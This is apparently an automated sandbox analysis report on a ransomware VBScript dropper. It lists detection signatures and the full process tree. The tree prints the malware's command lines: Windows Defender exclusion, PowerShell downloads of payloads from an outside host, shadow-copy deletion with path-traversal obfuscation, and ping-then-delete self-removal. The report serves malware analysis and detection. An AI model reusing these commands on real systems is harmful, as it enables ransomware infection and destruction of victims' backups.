Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS_1.vbs
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Classification
- System is w10x64
- wscript.exe (PID: 1456 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 1528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2120 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5888 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)
- chrome.exe (PID: 5260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 7264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,4385509434330054281,2454780159223617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cmd.exe (PID: 6380 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1196 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- control.exe (PID: 7960 cmdline: control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
- rundll32.exe (PID: 6256 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 576 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)
- cmd.exe (PID: 4312 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7936 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cmd.exe (PID: 3952 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4332 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cmd.exe (PID: 1272 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- eryy65ty.exe (PID: 520 cmdline: C:\Users\user~1\AppData\Local\Temp/eryy65ty.exe MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
- WMIC.exe (PID: 4008 cmdline: c:\jExFKd\jExF\..\..\Windows\jExF\jExF\..\..\system32\jExF\jExF\..\..\wbem\jExF\jExFK\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 8716 cmdline: c:\xMvAnp\xMvA\..\..\Windows\xMvA\xMvA\..\..\system32\xMvA\xMvA\..\..\wbem\xMvA\xMvAn\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 8732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8724 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 8800 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 4848 cmdline: "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
- WMIC.exe (PID: 4084 cmdline: c:\qYxiJv\qYxi\..\..\Windows\qYxi\qYxi\..\..\system32\qYxi\qYxi\..\..\wbem\qYxi\qYxiJ\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 9116 cmdline: c:\mCMXKV\mCMX\..\..\Windows\mCMX\mCMX\..\..\system32\mCMX\mCMX\..\..\wbem\mCMX\mCMXK\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 9132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 9124 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 9140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 9200 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 5292 cmdline: "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
- WMIC.exe (PID: 8556 cmdline: c:\DgeFGH\DgeF\..\..\Windows\DgeF\DgeF\..\..\system32\DgeF\DgeF\..\..\wbem\DgeF\DgeFG\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 8564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 5424 cmdline: c:\mZDBzN\mZDB\..\..\Windows\mZDB\mZDB\..\..\system32\mZDB\mZDB\..\..\wbem\mZDB\mZDBz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4664 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 4188 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 8876 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
No configs have been found
No yara matches
Operating System Destruction
- Author: Joe Security

System Summary
- Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
- Author: Jonathan Cheong, oscd.community
- Author: Jonathan Cheong, oscd.community
- Author: Jonathan Cheong, oscd.community
- Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
- Author: Ilya Krestinichev
- Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
- Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
- Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
- Author: Christian Burkard (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
- Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
- Author: frack113, Nasreddine Bencherchali
- Author: Michael Haag
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
- Author: vburov
No Suricata rule has matched
AV Detection
- ReversingLabs (2 entries)
- Integrated Neural Analysis Model (1 entry)
- HTTP Parser (3 entries)
- HTTPS traffic detected (2 entries)
- Binary string (3 entries)
- File opened (6 entries)

Software Vulnerabilities
- Child (2 entries)

Networking
- Process created (1 entry)
- IP Address (1 entry)
- JA3 fingerprint (1 entry)
- TCP traffic detected without corresponding DNS query (21 entries)
- UDP traffic detected without corresponding DNS query (6 entries)
- HTTP traffic detected (5 entries)
- String found in binary or memory (2 entries)
- DNS traffic detected (3 entries)
- HTTP traffic detected (1 entry)